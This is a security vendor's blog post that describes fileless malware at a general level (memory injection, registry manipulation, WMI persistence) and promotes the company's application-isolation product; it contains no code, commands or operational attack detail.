Close

Request Demo

BUFFERZONE is available to Enterprise companies only. Please fill out the form below and we’ll contact you shortly


    Enterprise

    Protect the enterprise where most breaches occur - at the endpoint

    Virtual Desktops

    VDI is vulnerable to advanced threats just like physical endpoints

    Financial

    Financial organizations need a robust, flexible solution for securing access to the internet, email attachments, and removable storage.

    Blog

    Back

    Fileless Malware Attacks Are on the Rise- But Do not Worry

    By BUFFERZONE Team, 6/07/2023

    Target: Consumers

    Tags: Fileless Malware, Bypass antivirus, Isolation, CDR

    The cybersecurity arena experienced significant evolution in 2020, marked by a substantial rise in fileless malware attacks. The rate skyrocketed to 900% more than the previous year [1]. Furthermore, a recent study from Aqua Security points out a drastic upswing of 1,400% in the number of fileless or memory-based attacks that exploit pre-existing software, applications, and protocols in 2022 [2]. This dramatic surge highlights the increasing complexity of cyber threats and underscores the urgent need for enhanced security mechanisms to ward off such attacks.

    What is Fileless attack

    Unlike conventional malware, fileless malware does not depend on executable files to perform its harmful activities. Rather, it operates within the system’s memory, eluding detection systems based on signatures that track file actions. This attribute significantly enhances the potency of fileless malware as it can smoothly slip past numerous antivirus solutions [3].

    The ability of fileless malware to remain undetected and maintain persistence renders it particularly hazardous. It can penetrate a system merely through a click on a malicious link or a visit to a compromised website, thereby presenting a substantial challenge to standard endpoint protection [1]. It compromises a system by exploiting programs that are typically considered safe and whitelisted by administrators. The lack of file downloads during the infection process makes fileless malware harder to identify than traditional malware, since it can evade hardware scans conducted by conventional antivirus tools.

    Notably, the infection process of fileless malware begins when a user, deceived by social engineering methods, clicks on a malicious link or attachment, often delivered through a phishing email [4]. The malware then invades the system and begins to propagate from one device to another.

    This implies that a fileless malware attack is part of a larger sequence of cyberattacks. To avert such an attack, it is essential to obstruct the initial attack vectors that trigger it.

     

    There are three primary types of fileless malware attacks: memory code injection, manipulation of the Windows registry [4] and using windows services like Windows Management Instrumentation (WMI).

    Memory code injection attacks involve hiding malicious code within the memory of trustworthy applications, typically exploiting weaknesses in software like Flash, Java, or web browsers. The malware operates its code inside these legitimate processes [4].

    Conversely, Windows registry manipulation attacks take place when an attacker utilizes a harmful link or file to alter a trusted Windows process. Once a user interacts with the hazardous link or file, the Windows process is employed to write and run fileless code in the registry. These attack types can effectively dodge detection from conventional antivirus software [4].  The third type of malware attacks saves malicious code to WMI’s CIM repository that upon boot starts legitimate services with malicious code. The CIM repository is itself saved to disk, but the code is well hidden [5].

    An additional feature of fileless malware is its capability to modify command lines, which are strings of code giving instructions to programs. As no unusual files are associated with the threat, traditional antivirus software often overlooks it [4].

    How to stop Fileless attacks

    To counteract these threats, it is vital to keep your software updated, particularly when it comes to Microsoft applications. Microsoft has stepped up its security game in recent versions and improved its Windows Defender package to spot abnormal PowerShell activities. Other providers, such as Endpoint Detection and Response (EDR), have put forth detection solutions to avert these attacks.

    However, the complexity of detection and the ability of malware creators to test their attacks against these defense mechanisms before launch can lead to the circumvention of existing security measures and bypass them. Consequently, our recommendation is to employ a zero-trust prevention strategy.

    BUFFERZONE® Safe Workspace™ is an extensive collection of preventive tools underpinned by application isolation technology. It includes Safe Browsing, SafeBridge® (equipped with Content Disarm and Reconstruction (CDR) capabilities), and Safe Removable (aimed at preventing USB attacks), all reinforced with clipboard security. A kernel driver establishes the Safe Workspace™ virtual container, effectively splitting the operating system into two distinct sections.

    The first section, referred to as the trusted zone, connects to all the organization’s networks and the operating system’s files. The second section, the untrusted zone, acts as a buffer, providing a safe space for various applications to operate independently from the trusted zone’s memory, files, registry, and processes.

    This avant-garde strategy offers numerous advantages, such as minimal CPU and memory usage, superior user experience, and the capacity to operate smoothly within the virtual container, all while being shielded from browsing and USB threats.

    BUFFERZONE® uniquely operates as a solitary virtual containment solution that leverages six patented technologies. Employing Safe Workspace™ provides protection from phishing attacks, harmful downloads, and potentially risky email attachments and links (via an Outlook extension). We hold the belief that security should be simple and accessible to the user.

    Try us now!

    References:

    [1] New Research: Fileless Malware Attacks Surge by 900% and Cryptominers Make a Comeback, While Ransomware Attacks Decline, WatchGuard Technologies, Inc , https://www.globenewswire.com/en/news-release/2021/03/30/2201173/0/en/New-Research-Fileless-Malware-Attacks-Surge-by-900-and-Cryptominers-Make-a-Comeback-While-Ransomware-Attacks-Decline.html

    [2] Michael Hill, Fileless attacks surge as cybercriminals evade cloud security defenses,

    https://www.csoonline.com/article/643356/fileless-attacks-surge-as-cybercriminals-evade-cloud-security-defenses.html

    [3] An emerging threat Fileless malware: a survey and research challenges, Kumar, Sushil, and others, https://cybersecurity.springeropen.com/articles/10.1186/s42400-019-0043-x

    [4] What is Fileless Malware, Fortinet,  https://www.fortinet.com/resources/cyberglossary/fileless-malware

    [5] Nick Ismail , Defending against fileless malware, https://www.information-age.com/defending-fileless-malware-6282/